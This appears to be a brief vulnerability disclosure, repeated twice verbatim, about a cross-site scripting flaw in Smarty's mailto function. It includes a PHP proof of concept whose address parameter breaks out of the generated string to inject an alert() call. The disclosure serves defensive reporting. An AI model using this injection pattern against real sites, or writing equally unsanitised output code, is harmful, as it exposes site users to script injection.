I found a bug in the Smarty package, specifically in the smarty_function_mailto($params) function.
Remote exploitation of such vulnerability is unlikely, but it is still advisable to take it into account.
A web page that uses this function and that could be parameterized using GET or POST input parameters could cause the injection of JavaScript code of a malicious user and cause cross-site scripting attacks.
Using the following code you can inject JavaScript code into the smarty_function_mailto function.
===============================================================
$params = array(
'encode'=>'javascript',
'address'=>'iricartb@gmail.com">iricartb@gmail.com'); alert("- JavaScript Injected -"); //',
);
echo smarty_function_mailto($params);
===============================================================
I found a bug in the Smarty package, specifically in the smarty_function_mailto($params) function.
Remote exploitation of such vulnerability is unlikely, but it is still advisable to take it into account.
A web page that uses this function and that could be parameterized using GET or POST input parameters could cause the injection of JavaScript code of a malicious user and cause cross-site scripting attacks.
Using the following code you can inject JavaScript code into the smarty_function_mailto function.
===============================================================
$params = array(
'encode'=>'javascript',
'address'=>'iricartb@gmail.com">iricartb@gmail.com'); alert("- JavaScript Injected -"); //',
);
echo smarty_function_mailto($params);
===============================================================